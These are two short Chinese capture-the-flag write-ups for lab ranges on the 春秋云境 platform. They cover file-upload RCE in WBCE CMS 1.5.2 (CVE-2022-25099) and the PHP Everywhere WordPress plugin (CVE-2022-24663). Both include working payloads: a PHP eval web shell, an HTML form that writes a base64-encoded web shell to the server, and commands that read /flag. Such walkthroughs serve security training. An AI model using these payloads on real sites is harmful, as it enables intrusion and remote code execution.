【春秋云境】CVE-2022-25099靶场WP
网站地址:https://yunjing.ichunqiu.com/
渗透测试
1.已知提示
- WBCE CMS v1.5.2 /language/install.php 文件存在漏洞,攻击者可精心构造文件上传造成RCE
2.开启靶场
3.登陆后台
-
访问/admin,账号admin:密码:123456.成功登陆到后台管理员界面
4.找到提示中的路径
-
提示给出的路径不完整,但是根据所给的提示可以看出应该是一个安装语言包的地方。咱们就根据这个思路去寻找上传语言包的位置。点击左侧的Add-ons,再点击Language,发现上传点
5.尝试文件上传
-
尝试上传一句话木马,发现被过滤了
6.远程代码执行
-
那就可以换个思路,考虑在一句话木马里面添加命令,实现远程代码命令执行,从而获得flag
<?php eval($_REQUEST['cmd']); system('cat /flag'); ?>
成功获得flag
【春秋云境】CVE-2022-24663靶场WP
网站地址:https://yunjing.ichunqiu.com/
渗透测试
1.已知提示
- 远程代码执行漏洞,任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码。P.S. 存在常见用户名低权限用户弱口令
2.开启靶场
3.登录后台
-
已知使用wordpress搭建的网站,直接访问/wp-admin,账号密码都为test
4.构造exp
-
提示任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上任意位置执行任意 PHP 代码
<form action="http://eci-2ze8ksyuxp0f18m9ri0x.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php" method="post" > <input name="action" value="parse-media-shortcode" /> <textarea name="shortcode"> [php_everywhere]<?php file_put_contents("/var/www/html/glc.php", base64_decode("PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTsgPz4="));?>[/php_everywhere]</textarea > <input type="submit" value="Execute" /> </form>
5.验证提交的exp
-
点击execute,返回json数据。显示success
6.执行命令
-
访问/glc.php?cmd=system(%27cat%20/flag%27);获得flag